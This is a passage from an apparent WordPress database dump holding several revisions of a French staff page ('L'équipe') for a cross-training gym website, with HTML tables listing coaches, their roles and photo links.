(137, 1, '2013-06-16 15:02:45', '2013-06-16 15:02:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:02:45', '2013-06-16 15:02:45', '', 20, 'http://www.crosstrainingcenter.be/?p=137', 0, 'revision', '', 0),
(241, 1, '2013-07-03 19:36:43', '2013-07-03 19:36:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:36:43', '2013-07-03 19:36:43', '', 20, 'http://www.crosstrainingcenter.be/?p=241', 0, 'revision', '', 0),
(138, 1, '2013-06-16 15:03:45', '2013-06-16 15:03:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\"><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table></div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:03:45', '2013-06-16 15:03:45', '', 20, 'http://www.crosstrainingcenter.be/?p=138', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(140, 1, '2013-06-16 15:07:01', '2013-06-16 15:07:01', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\n\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:07:01', '2013-06-16 15:07:01', '', 20, 'http://www.crosstrainingcenter.be/?p=140', 0, 'revision', '', 0),
(139, 1, '2013-06-16 15:04:18', '2013-06-16 15:04:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Daimen Pierrard</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-06-16 15:04:18', '2013-06-16 15:04:18', '', 20, 'http://www.crosstrainingcenter.be/?p=139', 0, 'revision', '', 0),
(141, 1, '2013-06-16 15:07:42', '2013-06-16 15:07:42', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full 